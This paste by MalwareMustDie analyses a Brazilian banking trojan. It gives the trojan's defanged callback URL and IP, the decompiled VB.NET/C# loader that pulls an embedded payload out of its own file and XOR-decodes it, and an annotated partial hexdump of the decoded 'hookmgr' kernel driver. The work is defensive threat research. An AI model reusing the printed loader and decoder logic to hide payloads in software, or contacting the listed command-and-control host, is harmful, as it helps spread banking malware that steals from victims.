
BraziL BankTrojan VB.NET w/Embed bins 37MB

MalwareMustDie Jan 30th, 2016 (edited) 824 Never
 
  1. // #MalwareMustDie - Case: Brazil Bank Trojan w/size 37MB
  2. // It IS a VB.NET executable with an embedded binary.
  3. // callback to:
  4. // GET HTTP/1.1
  5. // h00p://contador.blackmagictwo.com/visualizar/fix.php
  6.    {
  7.      "ip": "200.98.201.148",
  8.      "ptr": "200-98-201-148.clouduol.com.br",
  9.      "country": "BR",
  10.      "loc": "-23.5477,-46.6358",
  11.      "org": "AS7162 Universo Online S.A."
  12.      "prf": "200.98.192.0/18 uol.com.br"
  13.    }
  14. // picref: https://twitter.com/MalwareMustDie/status/693641189648572416 (read full thread)
  15. // Sample (2)
  16.    https://www.virustotal.com/en/file/57a2dd99dd0c153a45b52f065645a8953b8a8fcef97a6c3538a4de166f845474/analysis/1454211673/
  17.    https://www.virustotal.com/en/file/887b3c737be52c594c12b564269bad659d9f8a37624bf6a624857d0735fc973c/analysis/1454219912/
  18.  
  19. // JINXED MALCODE BIN LOADER
  20.  
  21. // Toiusx.saojoao.Program
  // Entry point. It does no work itself: it only starts Form2's BackgroundWorker1,
  // so the actual loader logic runs on a worker thread (see BackgroundWorker1_DoWork).
  22. public static void Main()
  23.  {  MyProject.Forms.Form2.BackgroundWorker1.RunWorkerAsync();}
  24.  
  // Form1's Load handler calls straight back into Program.Main(), i.e. showing the
  // form is what (re)starts the loader. The form's own purpose appears to be hosting
  // the text-box values (var1/var2/var13/var14) the decoder reads below - confirm.
  25. private void Form1_Load(object sender, EventArgs e)
  26.   {Program.Main();}
  27.  
  // Worker-thread body. `WHATEVER` is the analyst's placeholder name; the routine it
  // stands for is presumably the decoder shown next (renamed MMD-NAil3dYourC0de here).
  28. private void BackgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
  29.   {this.WHATEVER();}
  30.  
  // Payload decoder / loader. The method name was replaced by the analyst (it is not a
  // valid C# identifier as shown) and the trailing "\\" on lines 32 and 34 are the
  // analyst's line-wrap markers, not C# syntax.
  // 1. Reads its own executable as text (Application.ExecutablePath) and splits it on
  //    the marker stored in Settings.tamp; the payload is the second segment, array[1].
  // 2. Resolves a System.Convert method by name at run time. The name is assembled from
  //    two form text boxes (var1 + var2), so it never appears as one string in the
  //    binary; the method is invoked statically on the payload segment to get raw bytes.
  // 3. Runs those bytes through READ_BYTES with a key built from var13 + var14 and hands
  //    the result to Form1.Bolhax (not shown in this listing).
  // Detection angle: a managed binary reading its own ExecutablePath and reflecting over
  // typeof(Convert) with a string-built method name is a strong loader indicator.
  31. public void MMD-NAil3dYourC0de()
  32.  {  string[] array = Strings.Split(File.ReadAllText(Application.ExecutablePath),\\
  33.                      MySettingsProperty.Settings.tamp, -1, CompareMethod.Binary);
  34.     byte[] fosga = (byte[])typeof(Convert).GetMethod(this.var1.Text + this.var2.Text).\\
  35.                     Invoke(null, new object[]{array[1]});
  36.     Form1.Bolhax(Form1.READ_BYTES(fosga, this.var13.Text + this.var14.Text));  }
  37.  
  // Byte-wise XOR decoder for the embedded payload.
  //   fosga - bytes returned by the Convert call above; reversed IN PLACE here, so the
  //           caller's array is modified too.
  //   ximu  - key string (var13 + var14), converted with Encoding.Default, so the key
  //           bytes depend on the machine's ANSI code page.
  // Returns a buffer one byte longer than the input; the extra last byte is left 0.
  // Each output byte is fosga[i] ^ b ^ bytes[num], where b is the last byte of the
  // reversed input (the first byte of the original) and the key array is reversed after
  // every byte. num advances by Settings.rip and resets to 0 only when it equals
  // bytes.Length - rip; if rip does not step evenly onto that value the index runs past
  // the key and throws IndexOutOfRangeException - TODO confirm against the real setting.
  // The whole loop is inside `checked`, so integer overflow throws rather than wrapping.
  38. public static byte[] READ_BYTES(byte[] fosga, string ximu)
  39.  {  Array.Reverse(fosga);
  40.     checked
  41.      {
       // b = original first byte of the payload (input is already reversed).
  42.       byte b = fosga[fosga.Length - 1];
  43.       byte[] bytes = Encoding.Default.GetBytes(ximu);
  44.       byte[] array = new byte[fosga.Length + 1];
  45.       int num = 0;
  46.       int arg_30_0 = 0;
  47.       int num2 = fosga.Length - 1;
  48.       for (int i = arg_30_0; i <= num2; i++)
  49.         {  array[i] = (fosga[i] ^ b ^ bytes[num]);
       // Key direction flips on every byte, so consecutive key bytes come from
       // opposite ends of the key string.
  50.        Array.Reverse(bytes);
       // Settings.rip is read and converted on every iteration (decompiler output).
  51.        if ((double)num == unchecked((double)bytes.Length - Conversions.ToDouble(MySettingsProperty.Settings.rip)))
  52.         {num = 0;}
  53.        else
  54.         {num = (int)Math.Round(unchecked((double)num + Conversions.ToDouble(MySettingsProperty.Settings.rip)));}
  55.         } return array;}}
  56.  
  57. // The decoded data is actually a PE image (no file on disk) and is a malicious driver:
  58.    https://www.virustotal.com/en/file/e547aeb12345c226d24406ba751e9cb0f95a98b167b8eee5bacc370fc09d56e3/analysis/1454217852/
  59.  
  60. 00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
  61. 00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
  62. 00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  63. 00000030  00 00 00 00 00 00 00 00  00 00 00 00 c8 00 00 00  |................|
  64. 00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
  65. 00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
  66. 00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
  67. 00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
  68. 00000080  9b a7 2f 92 df c6 41 c1  df c6 41 c1 df c6 41 c1  |../...A...A...A.|
  69. 00000090  df c6 40 c1 d3 c6 41 c1  d6 be d2 c1 dc c6 41 c1  |..@...A.......A.|
  70. 000000a0  d6 be d4 c1 dd c6 41 c1  d6 be c2 c1 d9 c6 41 c1  |......A.......A.|
  71. 000000b0  d6 be d0 c1 de c6 41 c1  52 69 63 68 df c6 41 c1  |......A.Rich..A.|
  72. 000000c0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 05 00  |........PE..L...|
  73. 000000d0  15 52 5a 56 00 00 00 00  00 00 00 00 e0 00 02 01  |.RZV............|
  74. 000000e0  0b 01 09 00 00 0c 00 00  00 06 00 00 00 00 00 00  |................|
  75. 000000f0  3e 40 00 00 00 10 00 00  00 20 00 00 00 00 01 00  |>@....... ......|
  76. 00000100  00 10 00 00 00 02 00 00  06 00 01 00 06 00 01 00  |................|
  77. 00000110  06 00 01 00 00 00 00 00  00 60 00 00 00 04 00 00  |.........`......|
  78. 00000120  52 78 00 00 01 00 00 00  00 00 04 00 00 10 00 00  |Rx..............|
  79. 00000130  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
  80. 00000140  00 00 00 00 00 00 00 00  50 40 00 00 28 00 00 00  |........P@..(...|
  81. 00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  82. 00000160  00 00 00 00 00 00 00 00  00 50 00 00 94 00 00 00  |.........P......|
  83. 00000170  40 20 00 00 1c 00 00 00  00 00 00 00 00 00 00 00  |@ ..............|
  84. 00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  85. 00000190  60 20 00 00 40 00 00 00  00 00 00 00 00 00 00 00  |` ..@...........|
  86. 000001a0  00 20 00 00 34 00 00 00  00 00 00 00 00 00 00 00  |. ..4...........|
  87. 000001b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  88. 000001c0  2e 74 65 78 74 00 00 00  30 08 00 00 00 10 00 00  |.text...0.......|
  89. 000001d0  00 0a 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
  90. 000001e0  00 00 00 00 20 00 00 68  2e 72 64 61 74 61 00 00  |.... ..h.rdata..|
  91. 000001f0  34 01 00 00 00 20 00 00  00 02 00 00 00 0e 00 00  |4.... ..........|
  92. 00000200  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 48  |............@..H|
  93. 00000210  2e 64 61 74 61 00 00 00  38 00 00 00 00 30 00 00  |.data...8....0..|
  94. 00000220  00 02 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
  95. 00000230  00 00 00 00 40 00 00 c8  49 4e 49 54 00 00 00 00  |....@...INIT....|
  96. 00000240  90 01 00 00 00 40 00 00  00 02 00 00 00 12 00 00  |.....@..........|
  97. 00000250  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 e2  |............ ...|
  98. 00000260  2e 72 65 6c 6f 63 00 00  b6 00 00 00 00 50 00 00  |.reloc.......P..|
  99. 00000270  00 02 00 00 00 14 00 00  00 00 00 00 00 00 00 00  |................|
  100. 00000280  00 00 00 00 40 00 00 42  00 00 00 00 00 00 00 00  |....@..B........|
  101. 00000290  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  102. 00000410  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 17 01 00 8b  |..U......E......|
  103. 00000420  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  104. 00000430  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  105. 00000440  8b ff 55 8b ec 83 ec 0c  c7 45 f4 40 17 01 00 8b  |..U......E.@....|
  106. 00000450  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  107. 00000460  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  108. 00000470  8b ff 55 8b ec 6a fe 68  18 21 01 00 68 d0 13 01  |..U..j.h.!..h...|
  109. 00000480  00 64 a1 00 00 00 00 50  81 c4 cc fd ff ff 53 56  |.d.....P......SV|
  110. 00000490  57 a1 00 30 01 00 31 45  f8 33 c5 50 8d 45 f0 64  |W..0..1E.3.P.E.d|
  111. 000004a0  a3 00 00 00 00 89 65 e8  8b 45 0c 50 e8 ff 01 00  |......e..E.P....|
  112. 000004b0  00 89 85 d4 fd ff ff 8b  8d d4 fd ff ff 8b 51 08  |..............Q.|
  113. 000004c0  89 95 cc fd ff ff 8b 45  0c 8b 48 0c 89 4d e0 8b  |.......E..H..M..|
  114. 000004d0  55 0c c7 42 1c 00 00 00  00 8b 85 d4 fd ff ff 8a  |U..B............|
  115. 000004e0  08 88 8d c0 fd ff ff 80  bd c0 fd ff ff 0e 74 05  |..............t.|
  116. 000004f0  e9 72 01 00 00 8b 95 d4  fd ff ff 8b 42 0c 89 85  |.r..........B...|
  117. 00000500  bc fd ff ff 81 bd bc fd  ff ff 04 40 22 00 74 25  |...........@ .t%|
  118. 00000510  81 bd bc fd ff ff 0c 40  22 00 0f 84 a9 00 00 00  |.......@".......|
  119. 00000520  81 bd bc fd ff ff 14 40  22 00 0f 84 e2 00 00 00  |.......@".......|
  120. 00000530  e9 26 01 00 00 83 bd cc  fd ff ff 0c 72 7c 8b 4d  |.&..........r|.M|
  121. 00000540  e0 89 4d e4 c7 45 fc 00  00 00 00 6a 01 8b 55 e4  |..M..E.....j..U.|
  122. 00000550  8b 42 08 50 8b 4d e4 8b  11 52 ff 15 0c 20 01 00  |.B.P.M...R... ..|
  123. 00000560  8b 45 e4 8b 48 08 51 8b  55 e4 8b 42 04 50 8b 4d  |.E..H.Q.U..B.P.M|
  124. 00000570  e4 8b 11 52 e8 b1 03 00  00 83 c4 0c c7 85 c8 fd  |...R............|
  125. 00000580  ff ff 00 00 00 00 c7 45  fc fe ff ff ff eb 29 8b  |.......E......).|
  126. 00000590  45 ec 8b 08 8b 11 89 95  c4 fd ff ff b8 01 00 00  |E...............|
  127. 000005a0  00 c3 8b 65 e8 8b 85 c4  fd ff ff 89 85 c8 fd ff  |...e............|
  128. 000005b0  ff c7 45 fc fe ff ff ff  eb 0a c7 85 c8 fd ff ff  |..E.............|
  129. 000005c0  23 00 00 c0 e9 9c 00 00  00 83 3d 1c 30 01 00 00  |#.........=.0...|
  130. 000005d0  75 0a e8 39 fe ff ff a3  1c 30 01 00 83 3d 1c 30  |u..9.....0...=.0|
  131. 000005e0  01 00 00 74 21 8b 4d e0  8b 15 1c 30 01 00 89 11  |...t!.M....0....|
  132. 000005f0  8b 45 0c c7 40 1c 04 00  00 00 c7 85 c8 fd ff ff  |.E..@...........|
  133. 00000600  00 00 00 00 eb 0a c7 85  c8 fd ff ff 8c 02 00 c0  |................|
  134. 00000610  eb 53 83 3d 20 30 01 00  00 75 0a e8 20 fe ff ff  |.S.= 0...u.. ...|
  135. 00000620  a3 20 30 01 00 83 3d 20  30 01 00 00 74 21 8b 4d  |. 0...= 0...t!.M|
  136. 00000630  e0 8b 15 20 30 01 00 89  11 8b 45 0c c7 40 1c 04  |... 0.....E..@..|
  137. 00000640  00 00 00 c7 85 c8 fd ff  ff 00 00 00 00 eb 0a c7  |................|
  138. 00000650  85 c8 fd ff ff 8c 02 00  c0 eb 0a c7 85 c8 fd ff  |................|
  139. 00000660  ff 10 00 00 c0 eb 0a c7  85 c8 fd ff ff 00 00 00  |................|
  140. 00000670  00 8b 4d 0c 8b 95 c8 fd  ff ff 89 51 18 32 d2 8b  |..M........Q.2..|
  141. 00000680  4d 0c ff 15 08 20 01 00  33 c0 8b 4d f0 64 89 0d  |M.... ..3..M.d..|
  142. 00000690  00 00 00 00 59 5f 5e 5b  8b e5 5d c2 08 00 cc cc  |....Y_^[..].....|
  143. 000006a0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  144. 000006b0  8b ff 55 8b ec 51 8b 45  08 0f be 48 23 8b 55 08  |..U..Q.E...H#.U.|
  145. 000006c0  0f be 42 22 83 c0 01 3b  c8 7e 20 6a 00 68 15 5b  |..B....;.~ j.h.[|
  146. 000006d0  00 00 68 b0 17 01 00 68  80 17 01 00 ff 15 14 20  |..h....h....... |
  147. 000006e0  01 00 c7 45 fc 00 00 00  00 eb 07 c7 45 fc 01 00  |...E........E...|
  148. 000006f0  00 00 8b 4d 08 8b 41 60  8b e5 5d c2 04 00 cc cc  |...M..A`..].....|
  149. 00000700  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  150. 00000710  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 18 01 00 c7  |..U......E......|
  151. 00000720  45 f8 e0 17 01 00 8b 45  f4 50 68 28 30 01 00 ff  |E......E.Ph(0...|
  152. 00000730  15 04 20 01 00 8b 4d f8  51 68 30 30 01 00 ff 15  |.. ...M.Qh00....|
  153. 00000740  04 20 01 00 68 18 30 01  00 6a 00 6a 00 6a 15 68  |. ..h.0..j.j.j.h|
  154. 00000750  28 30 01 00 6a 00 8b 55  08 52 ff 15 20 20 01 00  |(0..j..U.R..  ..|
  155. 00000760  89 45 fc 83 7d fc 00 7c  4a 68 28 30 01 00 68 30  |.E..}..|Jh(0..h0|
  156. 00000770  30 01 00 ff 15 1c 20 01  00 89 45 fc 83 7d fc 00  |0..... ...E..}..|
  157. 00000780  7c 24 8b 45 08 c7 40 70  70 10 01 00 8b 4d 08 8b  ||$.E..@pp....M..|
  158. 00000790  55 08 8b 42 70 89 41 40  8b 4d 08 8b 55 08 8b 42  |U..Bp.A@.M..U..B|
  159. 000007a0  40 89 41 38 eb 0d 8b 0d  18 30 01 00 51 ff 15 18  |@.A8.....0..Q...|
  160. 000007b0  20 01 00 8b 45 fc 8b e5  5d c2 08 00 cc cc cc cc  | ...E...].......|
  161. 000007c0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  162. 000007d0  8b ff 55 8b ec 83 ec 14  53 8b 5d 0c 56 8b 73 08  |..U.....S.].V.s.|
  163. 000007e0  33 35 00 30 01 00 57 8b  06 c6 45 ff 00 c7 45 f8  |35.0..W...E...E.|
  164. 000007f0  01 00 00 00 8d 7b 10 83  f8 fe 74 0d 8b 4e 04 03  |.....{....t..N..|
  165. 00000800  cf 33 0c 38 e8 c2 02 00  00 8b 4e 0c 8b 46 08 03  |.3.8......N..F..|
  166. 00000810  cf 33 0c 38 e8 b2 02 00  00 8b 45 08 f6 40 04 66  |.3.8......E..@.f|
  167. 00000820  0f 85 e2 00 00 00 8b 4d  10 8d 55 ec 89 53 fc 8b  |.......M..U..S..|
  168. 00000830  5b 0c 89 45 ec 89 4d f0  83 fb fe 74 5f 8d 49 00  |[..E..M....t_.I.|
  169. 00000840  8d 04 5b 8b 4c 86 14 8d  44 86 10 89 45 f4 8b 00  |..[.L...D...E...|
  170. 00000850  89 45 08 85 c9 74 14 8b  d7 e8 cc 01 00 00 c6 45  |.E...t.........E|
  171. 00000860  ff 01 85 c0 7c 40 7f 47  8b 45 08 8b d8 83 f8 fe  |....|@.G.E......|
  172. 00000870  75 ce 80 7d ff 00 74 24  8b 06 83 f8 fe 74 0d 8b  |u..}..t$.....t..|
  173. 00000880  4e 04 03 cf 33 0c 38 e8  3f 02 00 00 8b 4e 0c 8b  |N...3.8.?....N..|
  174. 00000890  56 08 03 cf 33 0c 3a e8  2f 02 00 00 8b 45 f8 5f  |V...3.:./....E._|
  175. 000008a0  5e 5b 8b e5 5d c3 c7 45  f8 00 00 00 00 eb c9 8b  |^[..]..E........|
  176. 000008b0  4d 0c e8 a3 01 00 00 8b  45 0c 39 58 0c 74 12 68  |M.......E.9X.t.h|
  177. 000008c0  00 30 01 00 57 8b d3 8b  c8 e8 a6 01 00 00 8b 45  |.0..W..........E|
  178. 000008d0  0c 8b 4d 08 89 48 0c 8b  06 83 f8 fe 74 0d 8b 4e  |..M..H......t..N|
  179. 000008e0  04 03 cf 33 0c 38 e8 e0  01 00 00 8b 4e 0c 8b 56  |...3.8......N..V|
  180. 000008f0  08 03 cf 33 0c 3a e8 d0  01 00 00 8b 45 f4 8b 48  |...3.:......E..H|
  181. 00000900  08 8b d7 e8 39 01 00 00  ba fe ff ff ff 39 53 0c  |....9........9S.|
  182. 00000910  74 8a 68 00 30 01 00 57  8b cb e8 55 01 00 00 e9  |t.h.0..W...U....|
  183. 00000920  54 ff ff ff cc cc cc cc  cc cc ff 25 10 20 01 00  |T..........%. ..|
  184. 00000930  cc cc cc cc cc cc cc cc  53 56 57 8b 54 24 10 8b  |........SVW.T$..|
  185. 00000940  44 24 14 8b 4c 24 18 55  52 50 51 51 68 c8 15 01  |D$..L$.URPQQh...|
  186. 00000950  00 64 ff 35 00 00 00 00  a1 00 30 01 00 33 c4 89  |.d.5......0..3..|
  187. 00000960  44 24 08 64 89 25 00 00  00 00 8b 44 24 30 8b 58  |D$.d.%.....D$0.X|
  188. 00000970  08 8b 4c 24 2c 33 19 8b  70 0c 83 fe fe 74 3b 8b  |..L$,3..p....t;.|
  189. 00000980  54 24 34 83 fa fe 74 04  3b f2 76 2e 8d 34 76 8d  |T$4...t.;.v..4v.|
  190. 00000990  5c b3 10 8b 0b 89 48 0c  83 7b 04 00 75 cc 68 01  |\.....H..{..u.h.|
  191. 000009a0  01 00 00 8b 43 08 e8 ee  00 00 00 b9 01 00 00 00  |....C...........|
  192. 000009b0  8b 43 08 e8 00 01 00 00  eb b0 64 8f 05 00 00 00  |.C........d.....|
  193. 000009c0  00 83 c4 18 5f 5e 5b c3  8b 4c 24 04 f7 41 04 06  |...._^[..L$..A..|
  194. 000009d0  00 00 00 b8 01 00 00 00  74 33 8b 44 24 08 8b 48  |........t3.D$..H|
  195. 000009e0  08 33 c8 e8 e3 00 00 00  55 8b 68 18 ff 70 0c ff  |.3......U.h..p..|
  196. 000009f0  70 10 ff 70 14 e8 3e ff  ff ff 83 c4 0c 5d 8b 44  |p..p..>......].D|
  197. 00000a00  24 08 8b 54 24 10 89 02  b8 03 00 00 00 c3 55 8b  |$..T$.........U.|
  198. 00000a10  4c 24 08 8b 29 ff 71 1c  ff 71 18 ff 71 28 e8 15  |L$..).q..q..q(..|
  199. 00000a20  ff ff ff 83 c4 0c 5d c2  04 00 55 56 57 53 8b ea  |......]...UVWS..|
  200. 00000a30  33 c0 33 db 33 d2 33 f6  33 ff ff d1 5b 5f 5e 5d  |3.3.3.3.3...[_^]|
  201. 00000a40  c3 8b ea 8b f1 8b c1 6a  01 e8 4b 00 00 00 33 c0  |.......j..K...3.|
  202. 00000a50  33 db 33 c9 33 d2 33 ff  ff e6 55 8b ec 53 56 57  |3.3.3.3...U..SVW|
  203. 00000a60  6a 00 6a 00 68 6f 16 01  00 51 e8 51 00 00 00 5f  |j.j.ho...Q.Q..._|
  204. 00000a70  5e 5b 5d c3 55 8b 6c 24  08 52 51 ff 74 24 14 e8  |^[].U.l$.RQ.t$..|
  205. 00000a80  b4 fe ff ff 83 c4 0c 5d  c2 08 00 cc cc cc cc cc  |.......]........|
  206. 00000a90  53 51 bb 08 30 01 00 eb  0b 53 51 bb 08 30 01 00  |SQ..0....SQ..0..|
  207. 00000aa0  8b 4c 24 0c 89 4b 08 89  43 04 89 6b 0c 55 51 50  |.L$..K..C..k.UQP|
  208. 00000ab0  58 59 5d 59 5b c2 04 00  ff d0 c3 cc cc cc cc cc  |XY]Y[...........|
  209. 00000ac0  ff 25 28 20 01 00 cc cc  cc cc cc 3b 0d 00 30 01  |.%( .......;..0.|
  210. 00000ad0  00 75 03 c2 00 00 e9 05  00 00 00 cc cc cc cc cc  |.u..............|
  211. 00000ae0  8b ff 55 8b ec 51 89 4d  fc 6a 00 ff 35 04 30 01  |..U..Q.M.j..5.0.|
  212. 00000af0  00 ff 35 00 30 01 00 ff  75 fc 68 f7 00 00 00 ff  |..5.0...u.h.....|
  213. 00000b00  15 2c 20 01 00 cc cc cc  cc cc cc cc cc cc cc cc  |., .............|
  214. ---------------------------------------------------------------------------------------------
  215. 00000b10  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadId
  216. 00000b20  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadId");
  217. 00000b30  61 00 64 00 49 00 64 00  00 00 cc cc cc cc cc cc  |a.d.I.d.........| return MmGetSystemRoutineAddress(&DestinationString);
  218. ---------------------------------------------------------------------------------------------
  219. 00000b40  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadProcessId
  220. 00000b50  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.|
  221. 00000b60  61 00 64 00 50 00 72 00  6f 00 63 00 65 00 73 00  |a.d.P.r.o.c.e.s.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadProcessId");
  222. 00000b70  73 00 49 00 64 00 00 00  cc cc cc cc cc cc cc cc  |s.I.d...........| return MmGetSystemRoutineAddress(&DestinationString);
  223. ---------------------------------------------------------------------------------------------
  224. 00000b80  49 72 70 2d 3e 43 75 72  72 65 6e 74 4c 6f 63 61  |Irp->CurrentLoca| c:\winddk\7600.16385.1\inc\ddk\wdm.h
  225. 00000b90  74 69 6f 6e 20 3c 3d 20  49 72 70 2d 3e 53 74 61  |tion <= Irp->Sta|
  226. 00000ba0  63 6b 43 6f 75 6e 74 20  2b 20 31 00 cc cc cc cc  |ckCount + 1.....|
  227. 00000bb0  63 3a 5c 77 69 6e 64 64  6b 5c 37 36 30 30 2e 31  |c:\winddk\7600.1|
  228. 00000bc0  36 33 38 35 2e 31 5c 69  6e 63 5c 64 64 6b 5c 77  |6385.1\inc\ddk\w|
  229. 00000bd0  64 6d 2e 68 00 cc cc cc  cc cc cc cc cc cc cc cc  |dm.h............|
  230. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  231. RtlAssert("Irp->CurrentLocation <= Irp->StackCount + 1", "c:\\winddk\\7600.16385.1\\inc\\ddk\\wdm.h", %d, 0); return *(_DWORD *)(%var + 96);
  232. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  233. ---------------------------------------------------------------------------------------------
  234. 00000be0  5c 00 44 00 6f 00 73 00  44 00 65 00 76 00 69 00  |\.D.o.s.D.e.v.i.| \DosDevices\hookmgr
  235. 00000bf0  63 00 65 00 73 00 5c 00  68 00 6f 00 6f 00 6b 00  |c.e.s.\.h.o.o.k.| RtlInitUnicodeString(&stru_13030, L"\\DosDevices\\hookmgr");
  236. 00000c00  6d 00 67 00 72 00 00 00  cc cc cc cc cc cc cc cc  |m.g.r...........|
  237. ---------------------------------------------------------------------------------------------
  238. 00000c10  5c 00 44 00 65 00 76 00  69 00 63 00 65 00 5c 00  |\.D.e.v.i.c.e.\.| \Device\hookmgr
  239. 00000c20  68 00 6f 00 6f 00 6b 00  6d 00 67 00 72 00 00 00  |h.o.o.k.m.g.r...| RtlInitUnicodeString(&DestinationString, L"\\Device\\hookmgr");
  240. 00000c30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  241. 00000e00  ac 40 00 00 c8 40 00 00  e0 40 00 00 f6 40 00 00  |.@...@...@...@..|
  242. 00000e10  06 41 00 00 10 41 00 00  1c 41 00 00 2e 41 00 00  |.A...A...A...A..| 0x11310
  243. 00000e20  46 41 00 00 58 41 00 00  74 41 00 00 80 41 00 00  |FA..XA..tA...A..| DeviceObj =
  244. 00000e30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| IoCreateDevice(DriverObject, 0,
  245. 00000e40  00 00 00 00 15 52 5a 56  00 00 00 00 02 00 00 00  |.....RZV........| &DestinationString, %d, 0, 0, &DeviceObject);
  246. 00000e50  5c 00 00 00 a8 20 00 00  a8 0e 00 00 00 00 00 00  |\.... ..........|
  247. 00000e60  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |H...............|
  248. 00000e70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  249. 00000e90  00 00 00 00 00 00 00 00  00 00 00 00 00 30 01 00  |.............0..|
  250. 00000ea0  10 21 01 00 02 00 00 00  52 53 44 53 46 e6 2e db  |.!......RSDSF...|
  251. 00000eb0  7b 74 f7 4e 8d 83 34 2d  26 1f 8f 6e 01 00 00 00  |{t.N..4-&..n....|
  252. ---------------------------------------------------------------------------------------------
  253. 00000ec0  63 3a 5c 75 73 65 72 73  5c 61 64 6d 69 6e 5c 61  |c:\users\admin\a|
  254. 00000ed0  70 70 64 61 74 61 5c 72  6f 61 6d 69 6e 67 5c 78  |ppdata\roaming\x|  A LOL
  255. 00000ee0  38 36 5c 6f 62 6a 63 68  6b 5f 77 69 6e 37 5f 78  |86\objchk_win7_x|  pdb :-P)
  256. 00000ef0  38 36 5c 69 33 38 36 5c  68 6f 6f 6b 6d 67 72 2e  |86\i386\hookmgr.|
  257. 00000f00  70 64 62 00 00 00 00 00  00 00 00 00 00 00 00 00  |pdb.............|
  258. ---------------------------------------------------------------------------------------------
  259. 00000f10  d0 13 00 00 c8 15 00 00  fe ff ff ff 00 00 00 00  |................|
  260. 00000f20  ac fd ff ff 00 00 00 00  fe ff ff ff 8f 11 01 00  |................|
  261. 00000f30  a2 11 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  262. 00000f40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  263. 00001000  4e e6 40 bb b1 19 bf 44  20 05 93 19 00 00 00 00  |N.@....D .......|
  264. 00001010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  265. 00001200  00 00 00 00 00 a1 00 30  01 00 b9 4e e6 40 bb 85  |.......0...N.@..|
  266. 00001210  c0 74 04 3b c1 75 1a a1  24 20 01 00 8b 00 35 00  |.t.;.u..$ ....5.|
  267. 00001220  30 01 00 a3 00 30 01 00  75 07 8b c1 a3 00 30 01  |0....0..u.....0.|
  268. 00001230  00 f7 d0 a3 04 30 01 00  c3 cc cc cc cc cc 8b ff  |.....0..........|
  269. 00001240  55 8b ec e8 bd ff ff ff  5d e9 c2 d2 ff ff cc cc  |U.......].......|
  270. 00001250  78 40 00 00 00 00 00 00  00 00 00 00 66 41 00 00  |x@..........fA..|
  271. 00001260  00 20 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |. ..............|
  272. 00001270  00 00 00 00 00 00 00 00  ac 40 00 00 c8 40 00 00  |.........@...@..|
  273. 00001280  e0 40 00 00 f6 40 00 00  06 41 00 00 10 41 00 00  |.@...@...A...A..|
  274. 00001290  1c 41 00 00 2e 41 00 00  46 41 00 00 58 41 00 00  |.A...A..FA..XA..|
  275. 000012a0  74 41 00 00 80 41 00 00  00 00 00 00 e6 03 4d 6d  |tA...A........Mm|
  276. 000012b0  47 65 74 53 79 73 74 65  6d 52 6f 75 74 69 6e 65  |GetSystemRoutine|
  277. 000012c0  41 64 64 72 65 73 73 00  ee 05 52 74 6c 49 6e 69  |Address...RtlIni|
  278. 000012d0  74 55 6e 69 63 6f 64 65  53 74 72 69 6e 67 00 00  |tUnicodeString..|
  279. 000012e0  ba 02 49 6f 66 43 6f 6d  70 6c 65 74 65 52 65 71  |..IofCompleteReq|
  280. 000012f0  75 65 73 74 00 00 dd 04  50 72 6f 62 65 46 6f 72  |uest....ProbeFor|
  281. 00001300  57 72 69 74 65 00 4b 08  6d 65 6d 63 70 79 00 00  |Write.K.memcpy..|
  282. 00001310  60 05 52 74 6c 41 73 73  65 72 74 00 fc 01 49 6f  |`.RtlAssert...Io|
  283. 00001320  44 65 6c 65 74 65 44 65  76 69 63 65 00 00 f1 01  |DeleteDevice....|
  284. 00001330  49 6f 43 72 65 61 74 65  53 79 6d 62 6f 6c 69 63  |IoCreateSymbolic|
